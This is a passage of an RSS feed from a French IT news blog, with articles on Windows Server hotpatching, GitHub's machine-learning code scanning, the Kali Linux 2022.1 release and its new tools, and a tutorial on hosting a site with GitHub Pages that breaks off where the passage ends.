limitée à Windows Server Azure Edition uniquement. Il est plutôt souhaitable que le hotpatching arrive finalement sur tous les Windows, même les clients. Mais je n'ai pas encore de calendrier pour cela".</em></div></div><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">It won&#39;t be available in AWS for quite some time, sorry. This feature is currently limited to Windows Server Azure Edition only. It&#39;s pretty desirable that hotpatching will eventually come to all Windows, even clients. But I don&#39;t have a timeline for this yet</p>&mdash; Ned Pyle (@NerdPyle) <a href="https://twitter.com/NerdPyle/status/1494081455357521925?ref_src=twsrc%5Etfw&ref=insys.fr">February 16, 2022</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p></p><h2 id="une-%C3%A9volution-mais-encore-limit%C3%A9e"><br>Une évolution, mais encore limitée</h2><p>Il est important de mentionner que les serveurs <strong>devront toujours être redémarrés après l'installation de mises à jour livrées par le canal de mise à jour Windows normal</strong> (non Hotpatch) qui ne sont pas incluses dans le programme Hotpatch.</p><p><strong>Les exemples de correctifs qui ne peuvent pas être installés sans redémarrage</strong> comprennent les mises à jour non Windows (telles que <strong>les correctifs .NET</strong>) et<strong> les mises à jour non liées à la sécurité</strong> publiées pour Windows.</p><p><strong>Des redémarrages seront également nécessaires périodiquement après l'installation d'une nouvelle ligne de base pour que les VM restent synchronisées avec les correctifs non sécuritaires</strong> inclus dans la dernière mise à jour cumulative de Windows.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text"><strong>Microsoft </strong><a href="https://docs.microsoft.com/en-us/azure/automanage/automanage-hotpatch?ref=insys.fr#are-reboots-still-needed-for-a-vm-enrolled-in-hotpatch">explique</a> :<br><br>"Les lignes de base (qui nécessitent un redémarrage) <strong>commenceront à une cadence de trois mois</strong> <strong>et augmenteront au fil du temps</strong>"</div></div><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text"><strong>M. Pyle</strong> a ajouté : <br><br>"Si vous devez installer une mise à jour en dehors du programme Hotpatch, vous pouvez désactiver et désenrôler le hotpatching sur une VM et revenir à un comportement de mise à jour typique pour Windows Server. Vous pouvez réinscrire le hotpatching de la VM ultérieurement"</div></div><p><br>Vous trouverez plus de détails sur la façon dont vous pouvez activer le correctif à chaud pour vos VM Windows Server Azure dans <a href="https://techcommunity.microsoft.com/t5/itops-talk-blog/announcing-general-availability-of-hotpatch-for-windows-server/ba-p/3168095?ref=insys.fr">cet article de blog</a> ou sur <a href="https://docs.microsoft.com/en-us/azure/automanage/automanage-hotpatch?ref=insys.fr">cette page Microsoft Docs</a>.</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ GitHub détecte désormais davantage de vulnérabilités de sécurité grâce à l&#x27;analyse de code ]]></title>
                    <description><![CDATA[ La plate-forme d&#39;hébergement de code GitHub a lancé aujourd&#39;hui de nouvelles fonctionnalités d&#39;analyse de code basées sur l&#39;apprentissage automatique qui découvriront automatiquement les vulnérabilités de sécurité les plus courantes avant qu&#39;elles ne se retrouvent en production. ]]></description>
                    <link>https://insys.fr/blog/github-detecte-desormais-davantage-de-vulnerabilites-de-securite-grace-a-lanalyse-de-code/</link>
                    <guid isPermaLink="false">620edc9eba827c006234033a</guid>
                    <category><![CDATA[ GitHub ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Fri, 18 Feb 2022 09:30:14 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1618401479427-c8ef9465fbe1?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDJ8fGdpdHxlbnwwfHx8fDE2NDUxNDE0NDQ&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <p>La plate-forme d'hébergement de code <a href="https://github.com/?ref=insys.fr">GitHub</a> a lancé récemment de nouvelles fonctionnalités d'analyse de code basées sur l'apprentissage automatique qui découvriront automatiquement les vulnérabilités de sécurité les plus courantes avant qu'elles ne se retrouvent en production.</p><p>Ces nouvelles fonctionnalités expérimentales d'analyse statique sont désormais disponibles<strong> pour les référentiels JavaScript et TypeScript</strong> GitHub en <strong>version bêta publique</strong>.</p><h2 id="quelle-cible"><br>Quelle cible ?</h2><p><strong>Tiferet Gazi</strong> et <strong>Alona Hlobina</strong> <a href="https://github.blog/2022-02-17-code-scanning-finds-vulnerabilities-using-machine-learning/?ref=insys.fr">ont déclaré</a> :</p><ul><li><em>"Grâce aux nouvelles capacités d'analyse, l'analyse de code peut générer encore plus d'alertes pour quatre modèles de vulnérabilité courants : <strong>cross-site scripting (XSS), path injection, injection NoSQL, et injection SQL".</strong></em></li></ul><p></p><ul><li><em>"Ensemble, <strong>ces quatre types de vulnérabilités représentent de nombreuses vulnérabilités récentes</strong> (<strong>CVE</strong>) dans l'<strong>écosystème JavaScript/TypeScript</strong>, et l'amélioration de la capacité de l'analyse de code à détecter ces vulnérabilités au début du processus de développement est essentielle pour aider les développeurs à <strong>écrire un code plus sécurisé</strong>."</em></li></ul><h2 id="comment-en-profiter"><br>Comment en profiter ?</h2><p>Les vulnérabilités de sécurité découvertes par les nouvelles fonctionnalités expérimentales d'analyse de code apparaîtront sous forme d'alertes <strong>dans l'onglet "Sécurité"</strong> des référentiels inscrits.</p><p>Ces nouvelles alertes sont marquées à l'aide d'un label "<strong>Experimental</strong>" et <strong>seront également disponibles via l'onglet</strong> "<strong>Pull requests</strong>".</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/experimental-label-alerts-1.png" width="1024" height="451" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/experimental-label-alerts-1.png 600w, https://insys.fr/content/images/size/w1000/2022/02/experimental-label-alerts-1.png 1000w, https://insys.fr/content/images/2022/02/experimental-label-alerts-1.png 1024w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/154493387-afede08a-dab7-4adf-8268-83a8e6527db6.png" width="1262" height="756" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/154493387-afede08a-dab7-4adf-8268-83a8e6527db6.png 600w, https://insys.fr/content/images/size/w1000/2022/02/154493387-afede08a-dab7-4adf-8268-83a8e6527db6.png 1000w, https://insys.fr/content/images/2022/02/154493387-afede08a-dab7-4adf-8268-83a8e6527db6.png 1262w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Alertes d'analyse de code expérimentales (GitHub)</figcaption></figure><p>Le moteur d'analyse de code <strong><a href="https://codeql.github.com/?ref=insys.fr">CodeQL</a></strong>, qui alimente l'analyse de code de GitHub, a été ajouté aux capacités de la plate-forme après que GitHub a acquis la plate-forme d'analyse de code Semmle en <a href="https://github.blog/2019-09-18-github-welcomes-semmle/?ref=insys.fr">septembre 2019</a>.</p><p>GitHub a publié la première version bêta d'analyse de code sur <a href="https://github.blog/2020-05-06-new-from-satellite-2020-github-codespaces-github-discussions-securing-code-in-private-repositories-and-more/?ref=insys.fr#security">GitHub Satellite</a> en mai 2020 et <a href="https://github.blog/2020-09-30-code-scanning-is-now-available/?ref=insys.fr">a annoncé sa disponibilité générale</a> quatre mois plus tard, en septembre 2020.</p><p><strong>Au cours des tests bêta</strong>, la fonction d'analyse de code a été utilisée pour analyser plus de 12 000 référentiels 1,4 million de fois et <strong>a détecté plus de 20 000 problèmes de sécurité</strong>, notamment des failles d'exécution de code à distance (<strong>RCE</strong>), d'<strong>injection SQL</strong> et <strong>cross-site scripting (XSS)</strong> .</p><p>L'analyse du code GitHub est gratuite pour les référentiels publics et est disponible en tant que fonctionnalité de sécurité avancée GitHub pour les référentiels privés GitHub Enterprise.</p><p>Pour configurer l'analyse de code<strong> pour votre code JavaScript/TypeScript</strong>, vous pouvez suivre <a href="https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/setting-up-code-scanning-for-a-repository?ref=insys.fr">ces instructions</a>. Les nouvelles fonctionnalités sont disponibles pour les suites d'analyse de sécurité étendue et de sécurité et qualité de l'analyse de code.</p><h2 id="une-fonctionnalit%C3%A9-encore-exp%C3%A9rimentale"><br>Une fonctionnalité encore expérimentale</h2><p><strong>Gazit </strong>et <strong>Hlobina </strong><a href="http://github.blog/2022-02-17-code-scanning-finds-vulnerabilities-using-machine-learning/?ref=insys.fr">ont ajouté</a> :<br></p><ul><li><em>"Il est important de noter que pendant que nous continuons à améliorer et à tester nos modèles d'apprentissage automatique, cette nouvelle analyse expérimentale <strong>peut avoir un taux de faux positifs plus élevé</strong> par rapport aux résultats de notre analyse <strong>CodeQL </strong>standard".</em></li></ul><p></p><ul><li><em><strong>"Comme avec la plupart des modèles d'apprentissage automatique, les résultats s'amélioreront avec le temps.</strong>"</em></li></ul> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Mise à jour de Kali Linux (version 2022.1) : nouveaux outils, kali-linux-everything, changements visuels ]]></title>
                    <description><![CDATA[ Offensive Security a publié Kali Linux 2022.1, la dernière version de sa populaire plateforme de test d&#39;intrusion open source. ]]></description>
                    <link>https://insys.fr/blog/mise-a-jour-de-kali-linux-version-2022-1-nouveaux-outils-kali-linux-everything-changements-visuels/</link>
                    <guid isPermaLink="false">620d133aba827c006234024b</guid>
                    <category><![CDATA[ Sécurité ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Wed, 16 Feb 2022 16:50:08 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2022/02/banner-2022.1-release.jpg" medium="image"/>
                    <content:encoded><![CDATA[ <p>Pour commencer,<strong> qu'est ce que <a href="https://www.kali.org/?ref=insys.fr">Kali Linux</a> ?</strong><br><em><a href="https://www.kali.org/?ref=insys.fr">Kali Linux</a>  est une distribution Linux open source basée sur <a href="https://www.debian.org/?ref=insys.fr">Debian</a> conçue pour une variété de tâches de sécurité informatique, telles que les tests de pénétration, la recherche en sécurité, l'informatique judiciaire et l'ingénierie inverse.</em></p><hr><p>Mise à jour vers la version 2022.1, l'OS <a href="Kali Linux">Kali Linux</a> a été : visuellement actualisé et avec une facilité d'utilisation améliorée pour les utilisateurs malvoyants, il est également livré avec une nouvelle image "<strong><a href="https://www.kali.org/tools/kali-meta/?ref=insys.fr#kali-linux-everything">kali-linux-everything</a></strong>", une compatibilité plus large pour le client SSH de Kali et de nouveaux outils.</p><h2 id="modifications-et-am%C3%A9liorations-visuelles-et-audio"><br>Modifications et améliorations visuelles et audio</h2><p><strong>Kali Linux 2022.1 </strong>inclut :</p><ul><li><em>Nouveaux fonds d'écran pour les écrans de bureau, de connexion et de démarrage</em></li><li><em>Un thème d'installation actualisé et une page de destination du navigateur par défaut</em></li><li><em>Amélioration des fonctions, du thème et de la disposition du menu de démarrage présent dans les images ISO</em></li><li><em>L'invite de droite a été supprimée du shell ZSH par défaut et le crâne dans l'invite racine a été remplacé par un symbole K stylisé (mais les utilisateurs peuvent revenir au crâne s'ils le souhaitent)</em></li></ul><p>Par ailleurs, la fonction de synthèse vocale destinée à aider les utilisateurs aveugles et malvoyants de Kali ne fonctionnait pas, elle a été corrigée.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/desktop-wallpaper.png" width="1360" height="768" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/desktop-wallpaper.png 600w, https://insys.fr/content/images/size/w1000/2022/02/desktop-wallpaper.png 1000w, https://insys.fr/content/images/2022/02/desktop-wallpaper.png 1360w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/login-wallpaper.png" width="1280" height="720" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/login-wallpaper.png 600w, https://insys.fr/content/images/size/w1000/2022/02/login-wallpaper.png 1000w, https://insys.fr/content/images/2022/02/login-wallpaper.png 1280w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Kali Linux 2022.1</figcaption></figure><h2 id="une-nouvelle-saveur-et-une-plus-grande-compatibilit%C3%A9-pour-le-client-ssh-de-kali"><br>Une nouvelle "saveur" et une plus grande compatibilité pour le client SSH de Kali</h2><p>La nouvelle image "<a href="https://www.kali.org/tools/kali-meta/?ref=insys.fr#kali-linux-everything">kali-linux-everything</a>" offre aux utilisateurs qui ont besoin que tous les outils de Kali soient préinstallés en une image autonome hors ligne complète (<a href="https://fr.wikipedia.org/wiki/Image_disque?ref=insys.fr">ISO</a>). En raison de sa taille, cependant, elle ne sera <a href="https://www.kali.org/get-kali/?ref=insys.fr#kali-live">initialement proposée</a> que pour le téléchargement via torrent.</p><p>Le client SSH de Kali peut désormais être réglé sur le mode de compatibilité étendue, afin de faciliter la connexion et la découverte d'anciens serveurs SSH vulnérables.</p><p>"En mode de compatibilité étendue, les anciens algorithmes d'échange de clés (tels que diffie-hellman-*-sha1) et les anciens chiffrements (tels que CBC) sont activés. Par conséquent, les outils utilisés à l'intérieur de Kali sont capables de communiquer en utilisant ces méthodes obsolètes. Ceci est fait pour aider à augmenter la capacité de Kali à parler à des serveurs SSH plus anciens et obsolètes qui utilisent toujours ces anciens protocoles. Les anciens services utilisant ces protocoles peuvent être en fin de vie, ce qui augmente les chances de découvrir des vulnérabilités ou d'autres problèmes", <a href="https://www.kali.org/docs/general-use/ssh-configuration/?ref=insys.fr">expliquent les développeurs</a>.</p><h2 id="am%C3%A9liorations-de-vmware-i3"><br>Améliorations de VMware i3</h2><!--kg-card-begin: markdown--><p>Pour les utilisateurs qui utilisent Kali dans une VM invitée avec l'environnement de bureau i3 (<code>kali-desktop-i3</code>), les fonctionnalités hôte-invité de VMware (par exemple glisser-déposer, copier/coller) n'étaient pas activées par défaut, cela devait être fait manuellement. Ceci est maintenant corrigé et vous ne devriez rien avoir à faire, cela devrait fonctionner immédiatement. Cela a été activé avec le <a href="https://pkg.kali.org/pkg/i3-wm?ref=insys.fr">package i3-wm</a> <code>4.20.1-1</code>.</p>
<!--kg-card-end: markdown--><h2 id="nouveaux-outils-dans-kali-linux-20221"><br>Nouveaux outils dans Kali Linux 2022.1</h2><ul><li><a href="https://pkg.kali.org/pkg/dnsx?ref=insys.fr">dnsx</a> - Une boîte à outils DNS polyvalente qui permet aux utilisateurs d'exécuter plusieurs requêtes DNS.</li><li><a href="https://pkg.kali.org/pkg/email2phonenumber?ref=insys.fr">email2phonenumber</a> - Un outil OSINT pour découvrir le numéro de téléphone d'une cible si vous n'avez que son adresse e-mail</li><li><a href="https://pkg.kali.org/pkg/naabu?ref=insys.fr">naabu</a> - Un scanner de port simple et fiable</li><li><a href="https://pkg.kali.org/pkg/nuclei?ref=insys.fr">nuclei</a> - Analyse ciblée basée sur des modèles</li><li><a href="https://pkg.kali.org/pkg/poshc2?ref=insys.fr">PoshC2</a> - Cadre de travail C2 basé sur le proxy avec post-exploitation et mouvement latéral</li><li><a href="https://pkg.kali.org/pkg/proxify?ref=insys.fr">proxify</a> - Un couteau suisse de proxy pour la capture, la manipulation et la relecture du trafic HTTP/HTTPS</li></ul><h2 id="t%C3%A9l%C3%A9charger-kali-linux-20221"><br>Télécharger Kali Linux 2022.1</h2><p>Kali Linux 2022.1 est prêt pour le <a href="https://www.kali.org/get-kali/?ref=insys.fr">téléchargement</a> ou <a href="https://www.kali.org/docs/general-use/updating-kali/?ref=insys.fr">une mise à jour</a> immédiat.</p><p>Pour plus de détails sur les dernières modifications, consultez <a href="https://www.kali.org/blog/kali-linux-2022-1-release/?ref=insys.fr">le billet de blog d'Offensive Security</a>.</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Comment mettre en place un site web gratuit avec les pages GitHub ]]></title>
                    <description><![CDATA[ Un hébergement de site web gratuit avec les GitHub Pages avec possibilité d&#39;un nom de domaine personnalisé et un déploiement automatisé. ]]></description>
                    <link>https://insys.fr/blog/comment-mettre-en-place-un-site-web-gratuit-avec-les-pages-github/</link>
                    <guid isPermaLink="false">620b86796c702b006114cd35</guid>
                    <category><![CDATA[ GitHub ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Tue, 15 Feb 2022 14:29:00 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1630514969818-94aefc42ec47?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDR8fEdpdEh1YnxlbnwwfHx8fDE2NDQ5MjI1NTA&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <p><em>Il est de plus en plus facile d'héberger des sites Web, de nombreux services proposent des forfaits à partir de moins de 5 euros par mois. Mais si vous souhaitez simplement un site simple qui n'est pas destiné à recevoir une tonne de trafic, <a href="#mise-en-place-dune-page">vous pouvez peut-être l'héberger gratuitement sur GitHub</a> et <a href="#ajout-dun-domaine-personnalise">cela même avec votre propre domaine</a> !</em></p><h2 id="quest-ce-que-les-pages-github"><br>Qu'est-ce que les pages GitHub ?</h2><!--kg-card-begin: markdown--><p><a href="https://github.com/?ref=insys.fr">GitHub</a> est un service d'hébergement de code qui fournit un contrôle de version via <code>git</code>. Bien qu'il soit généralement utilisé par les développeurs, un cas d'utilisation courant pour eux est l'exécution de simples <strong>wikis</strong>, <strong>CV</strong> ou <strong>sites de documentation</strong> qui ne voient pas des tonnes de trafic quotidien, et ont juste besoin d'<strong>un endroit pour mettre en place un site Web gratuitement</strong>.</p>
<!--kg-card-end: markdown--><p>C'est pour cela qu'a été créé <strong><a href="https://pages.github.com/?ref=insys.fr">GitHub Pages</a></strong>, qui vous permet d'<strong>héberger gratuitement des fichiers HTML et d'autres ressources</strong>. Cela n'est pas très différent de l'hébergement de fichiers normal de <strong>GitHub </strong>: vous pouvez héberger des fichiers dans vos dépôts entièrement gratuitement, et héberger un site statique revient à héberger des fichiers.</p><!--kg-card-begin: markdown--><p>Vous pouvez avoir des pages pour votre nom d'utilisateur, ou des pages pour chaque dépôt. Par défaut, GitHub vous attribue une URL de sous-domaine comme <code>username.github.io</code> ou <code>username.github.io/repository</code>. Cette URL peut être modifiée en n'importe quelle URL personnalisée.</p>
<!--kg-card-end: markdown--><p></p><h2 id="que-sont-les-sites-web-statiques"><br>Que sont les sites web statiques ?</h2><p>Il est important de noter que <strong>les pages GitHub ne sont destinées qu'aux sites Web statiques</strong>. Cela ne signifie pas nécessairement que votre site ne peut pas être interactif, mais simplement qu'il est hébergé directement à partir des <strong>fichiers HTML, JS et CSS</strong>.</p><p>La principale restriction des sites Web statiques est qu'ils ne peuvent pas compter sur un serveur pour modifier le contenu à chaque requête, comme c'est le cas avec un langage comme <strong>PHP</strong>. Par exemple, <strong>si vous voulez que les utilisateurs s'inscrivent et consultent un profil</strong>, ou <strong>si vous voulez héberger WordPress (qui se connecte à un serveur de base de données), vous devrez l'héberger ailleurs</strong>.</p><!--kg-card-begin: markdown--><p>Cependant, <strong>si vous utilisez des frameworks JavaScript côté client comme <a href="https://reactjs.org/?ref=insys.fr">React</a></strong>, <strong>vous pouvez en fait héberger des applications Web entières à partir des pages Github</strong> ou de tout autre fournisseur d'hébergement de sites Web statiques. En effet, tout le contenu est généré sur l'appareil du client, et la seule chose que vous servez est un fichier <code>bundle.js</code> contenant tout le code.</p>
<!--kg-card-end: markdown--><p></p><h2 id="restrictions-des-pages-githubutilisation-non-commerciale"><br>Restrictions des pages GitHub - Utilisation non commerciale</h2><p>Bien sûr, cela s'accompagne de quelques restrictions. Essentiellement, vous n'êtes pas censé utiliser les pages GitHub à des fins principalement commerciales. Plus précisément, <strong>il est interdit</strong> de l'utiliser en tant que "<strong>service d'hébergement Web gratuit pour gérer votre entreprise en ligne, votre site de commerce électronique ou tout autre site Web visant principalement à faciliter les transactions commerciales</strong>".</p><p>Donc, <strong>si vous prévoyez d'exploiter votre entreprise à partir des pages GitHub</strong>, <strong>vous devrez probablement envisager d'autres solutions</strong>. Deux méthodes d'"<strong>hébergement gratuit</strong>" très similaires consistent à utiliser les<strong> buckets </strong><a href="https://aws.amazon.com/fr/s3/?ref=insys.fr"><strong>AWS Simple Storage Service</strong> </a>pour héberger des sites Web statiques, ou à utiliser l'hébergement statique <strong><a href="https://firebase.google.com/?ref=insys.fr">Firebase de Google</a></strong>. Ces deux méthodes fonctionnent bien pour les déploiements de sites statiques amateurs et professionnels, et proposent <strong>des niveaux gratuits qui peuvent vous éviter de payer environ 8€ par mois</strong> pour héberger votre propre serveur.</p><p>Les pages GitHub sont <a href="https://docs.github.com/en/pages/getting-started-with-github-pages/about-github-pages?ref=insys.fr#usage-limits">également soumises à des limites de taille et de bande passante</a>, bien qu'elles soient assez raisonnables. Votre site <strong>ne peut pas dépasser 1 Go </strong>(vous aurez probablement du mal à servir un site de cette taille de toute façon) et <strong>si vous dépassez 100 Go de bande passante par mois, GitHub peut ne pas servir votre site</strong>. À titre de référence, cette quantité de données <strong>vous coûterait environ 8€ par mois</strong> sur <a href="https://aws.amazon.com/?ref=insys.fr">Amazon Web Services</a>.</p><p></p><h2 id="mise-en-place-dune-page"><br>Mise en place d'une page</h2><p>La configuration de <strong>GitHub Pages</strong> est assez simple. Si vous êtes familier avec GitHub, cela devrait être encore plus facile.</p><!--kg-card-begin: markdown--><p>Fondamentalement, <strong>vous avez deux options pour les dépôts</strong> : les pages utilisateur ou les pages de projet. Si vous utilisez un domaine personnalisé, cela ne devrait pas avoir beaucoup d'importance, mais <strong>si vous voulez une belle URL</strong>, <strong>vous voudrez utiliser une page utilisateur</strong>, qui vous donnera une URL au format <code>username.github.io</code>.<br>
Si vous utilisez une page de projet, vous pouvez avoir plusieurs pages configurées, mais chacune sera au format <code>username.github.io/repository</code>.</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>Dans les deux cas, vous devrez créer un nouveau dépôt. Si vous créez une page utilisateur, <strong>définissez-la à votre nom d'utilisateur plus</strong> <code>.github.io</code>. <strong>Assurez-vous qu'il est également public</strong>.<br>
Par exemple :</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>in-sys.github.io
</code></pre>
<!--kg-card-end: markdown--><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-121051-1.png" class="kg-image" alt loading="lazy" width="1333" height="443" srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-15-121051-1.png 600w, https://insys.fr/content/images/size/w1000/2022/02/Capture-d--cran-2022-02-15-121051-1.png 1000w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-121051-1.png 1333w" sizes="(min-width: 720px) 720px"><figcaption>Création d'un repository avec l'extension ".github.io"</figcaption></figure><p>Ensuite, vous aurez besoin d'<strong>un client Git pour vous connecter à GitHub</strong> et pousser votre site web. Vous pouvez utiliser un terminal, ou un <strong>client GUI comme <a href="https://desktop.github.com/?ref=insys.fr">GitHub Desktop</a></strong>. Utilisez l'URL qui vous a été donnée lors de la configuration rapide :</p><p></p><figure class="kg-card kg-image-card"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-121624.png" class="kg-image" alt loading="lazy" width="1903" height="676" srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-15-121624.png 600w, https://insys.fr/content/images/size/w1000/2022/02/Capture-d--cran-2022-02-15-121624.png 1000w, https://insys.fr/content/images/size/w1600/2022/02/Capture-d--cran-2022-02-15-121624.png 1600w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-121624.png 1903w" sizes="(min-width: 720px) 720px"></figure><p>Ou, si vous utilisez l'application <strong><a href="https://desktop.github.com/?ref=insys.fr">GitHub Desktop</a></strong>, vous pouvez simplement le rechercher par son nom :</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-122917.png" class="kg-image" alt loading="lazy" width="1318" height="785" srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-15-122917.png 600w, https://insys.fr/content/images/size/w1000/2022/02/Capture-d--cran-2022-02-15-122917.png 1000w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-122917.png 1318w" sizes="(min-width: 720px) 720px"><figcaption>Clone d'un repository avec GitHub Deskop</figcaption></figure><p>Ensuite, vous devrez ajouter votre contenu. Si vous avez un modèle existant que vous souhaitez utiliser, copiez tous les fichiers (HTML, CSS, fichiers JS, images) dans ce répertoire, qui est essentiellement le "webroot" à partir duquel tout sera hébergé. La chose la plus importante est <strong>index.html</strong>, qui est la page principale de votre site.</p><p>Une fois que tout fonctionne localement, vous devez valider les modifications et les publier sur GitHub.</p><figure class="kg-card kg-image-card"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-125133.png" class="kg-image" alt loading="lazy" width="1457" height="788" srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-15-125133.png 600w, https://insys.fr/content/images/size/w1000/2022/02/Capture-d--cran-2022-02-15-125133.png 1000w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-125133.png 1457w" sizes="(min-width: 720px) 720px"></figure><p>Vous verrez bientôt les nouveaux fichiers dans votre référentiel, mais vous devrez <strong>activer les pages GitHub</strong> pour qu'elles fonctionnent pleinement. Sur la page du dépôt, cliquez sur "Paramètres" et faites défiler la page jusqu'à "Pages". Sélectionnez la branche principale à partir de laquelle vous allez servir votre site Web, puis cliquez sur "Enregistrer".</p><figure class="kg-card kg-image-card"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-125920.png" class="kg-image" alt loading="lazy" width="1389" height="769" srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-15-125920.png 600w, https://insys.fr/content/images/size/w1000/2022/02/Capture-d--cran-2022-02-15-125920.png 1000w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-125920.png 1389w" sizes="(min-width: 720px) 720px"></figure><p>La mise à jour peut prendre quelques minutes et <strong>ne s'effectuera que 10 fois par heure</strong>, alors ne faites pas de changements trop rapides.</p><figure class="kg-card kg-image-card"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-130826.png" class="kg-image" alt loading="lazy" width="1470" height="304" srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-15-130826.png 600w, https://insys.fr/content/images/size/w1000/2022/02/Capture-d--cran-2022-02-15-130826.png 1000w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-130826.png 1470w" sizes="(min-width: 720px) 720px"></figure><p>Vous devez également activer l'option "<strong>Enforce HTTPS</strong>" dans les paramètres des pages GitHub.</p><p></p><h2 id="ajout-dun-domaine-personnalis%C3%A9"><br>Ajout d'un domaine personnalisé</h2><p>L'ajout d'un domaine personnalisé est très simple. Vous devez d'abord en acheter un, ce que vous pouvez faire auprès de nombreux bureaux d'enregistrement différents.</p><!--kg-card-begin: markdown--><p><strong>Une fois enregistré</strong>, vous devrez faire pointer votre domaine vers votre page GitHub. Cependant, vous ne pouvez pas simplement coller l'URL ici ; vous devrez créer un <strong>enregistrement <code>CNAME</code></strong> qui pointe vers <code>username.github.io</code>. Si vous prévoyez d'utiliser <code>www</code>, définissez la valeur Host sur <code>www</code>. Si vous souhaitez utiliser le domaine de base seul, définissez la valeur Host sur <code>@</code>.</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-132313.png" class="kg-image" alt loading="lazy" width="1588" height="333" srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-15-132313.png 600w, https://insys.fr/content/images/size/w1000/2022/02/Capture-d--cran-2022-02-15-132313.png 1000w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-132313.png 1588w" sizes="(min-width: 720px) 720px"></figure><p></p><p><strong>Une fois l'enregistrement DNS effectué</strong>, il faut ajouter un domaine personnalisé dans <strong>la configuration GitHub Pages</strong>:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-132912.png" class="kg-image" alt loading="lazy" width="1416" height="311" srcset="https://insys.fr/content/images/size/w600/2022/02/Capture-d--cran-2022-02-15-132912.png 600w, https://insys.fr/content/images/size/w1000/2022/02/Capture-d--cran-2022-02-15-132912.png 1000w, https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-132912.png 1416w" sizes="(min-width: 720px) 720px"><figcaption>Configuration d'un domaine personnalisé dans la configuration GitHub Pages</figcaption></figure><p><strong>Après avoir attendu quelques minutes</strong> pour que les enregistrements DNS se synchronisent sur Internet, <strong>vous devriez pouvoir voir votre site Pages GitHub nouvellement créé à votre URL personnalisée</strong>, et le menu des paramètres devrait l'afficher comme connecté.<br></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/Capture-d--cran-2022-02-15-140319.png" class="kg-image" alt loading="lazy" width="315" height="109"><figcaption>Déploiement de GitHub Pages active</figcaption></figure><p><br><strong>Et donc l'accès à votre site web est opérationnel</strong>, vous pouvez voir le résultat de l'exemple ci-dessous : 